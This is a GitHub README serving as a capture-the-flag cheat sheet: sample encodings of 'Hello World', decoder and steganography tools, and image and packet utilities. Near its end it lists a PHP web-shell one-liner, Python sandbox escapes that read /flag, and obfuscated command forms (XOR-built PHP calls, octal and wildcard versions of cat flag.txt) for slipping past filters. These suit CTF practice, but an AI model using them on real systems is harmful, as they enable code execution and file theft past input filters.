Skip to content

kabilan1290/CTF-Reference

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

45 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CTF-Reference

Reference for CTF Challenges.

Note : All the encoded/encrypted strings are 'Hello World".

List of Numeral Systems - https://en.wikipedia.org/wiki/List_of_numeral_systems

Base 26(Hexavigesimal) => 3752127 10786572 - https://www.dcode.fr/base-26-cipher

Base 32 => NBSWY3DPEB3W64TMMQ====== - https://www.dcode.fr/base-32-encoding

Base 58 => StV1DL6CwTryKyV - https://www.dcode.fr/base-58-cipher

Base 64 => aGVsbG8gd29ybGQ= - https://www.dcode.fr/base-64-encoding

Base 85(Ascii85) => BOu!rD]j7BEbo7 - https://www.dcode.fr/ascii-85-encoding

Base 91 => >OwJh>Io0Tv!lE - https://www.dcode.fr/base-91-encoding

Base65536 => 驈ꍬ啯𒁗ꍲᕤ - https://www.better-converter.com/Encoders-Decoders/Base65536-Decode

Twin Hex ==> 30l5os5uo44v64s51c - https://www.calcresult.com/misc/cyphers/twin-hex.html

Ascii to x86 Disassembly - https://gchq.github.io/CyberChef/#recipe=From_Decimal('Comma',false)To_Hex('Space',0)Disassemble_x86('64','Full%20x86%20architecture',16,0,true,true)

Zero-width space Decoder - https://offdev.net/demos/zwsp-steg-js.

Unicode Analyzer - https://www.fontspace.com/unicode/analyzer

Live Disassembler - https://godbolt.org/

Linux Command Explaination - https://explainshell.com

Fernet online decoder - https://asecuritysite.com/encryption/ferdecode

rawpixels.net - for raw pixels decoding

Online Stegnography Tool - https://stegonline.georgeom.net/upload

Dig Webinterface - https://www.digwebinterface.com

Gif splitter - https://ezgif.com/split

convert challange.gif -transparent white result.gif

Online Packet analyser - https://apackets.com

Dual Tone Multi Frequency - http://dialabc.com/sound/detect/index.html

Cipher Identifier - https://www.boxentriq.com/code-breaking/cipher-identifier

pngcheck -qv test.png - Use this command to check for broken png.

Png repair tool - https://github.com/sherlly/PCRT

Simple one liner - <?php system("whoami");?>

Python Sandbox escape - globals()["__builtins__"].open("/flag").read()

Escape while builtins and open is blacklisted - globals().__getitem__(bytes.fromhex(%275f5f6275696c74696e735f5f%27).decode(%27utf-8%27)).__getitem__(bytes.fromhex(%276f70656e%27).decode(%27utf-8%27))(%22/flag%22,%20%22r%22).read()

Hashes Ref : https://blog.csdn.net/u013512548/article/details/108213295

PHP calc :

('000000'^'8288~!'^'{{{|+|')('000000000000'^'~,81~!,,0838'^'-}|!(}}{.|{|')

\143\141\164\40\146\154\141\147\56\164\170\164

/???/??? ????.??? - /bin/cat flag.txt

About

Reference for CTF Challenges.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published